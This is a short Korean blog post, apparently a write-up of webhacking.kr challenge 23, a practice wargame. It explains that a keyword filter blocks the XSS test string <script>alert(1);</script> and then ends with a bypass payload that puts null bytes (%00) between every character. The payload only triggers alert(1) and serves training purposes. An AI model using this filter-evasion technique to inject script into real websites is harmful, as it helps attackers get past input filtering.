티스토리 뷰

webhacking.kr 23번 문제 : 자바스크립트(?), 널 바이트


 

너의 미션은 다음 스크립트 문장을 집어 넣으세요




<script>alert(1);</script> 을 입력하면 no hack 이라고 나온다


script -> no hack


sc -> no hack


s -> 통과



그래서 결론은 한 문자씩 전달해야 하는 것이 포인트!


%0a , %0d , %20 을 연결해서 전달해 봤으나 다 실패


URL 에다가 널 바이트를 이용하면 %00 하면 된다! 


<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>%00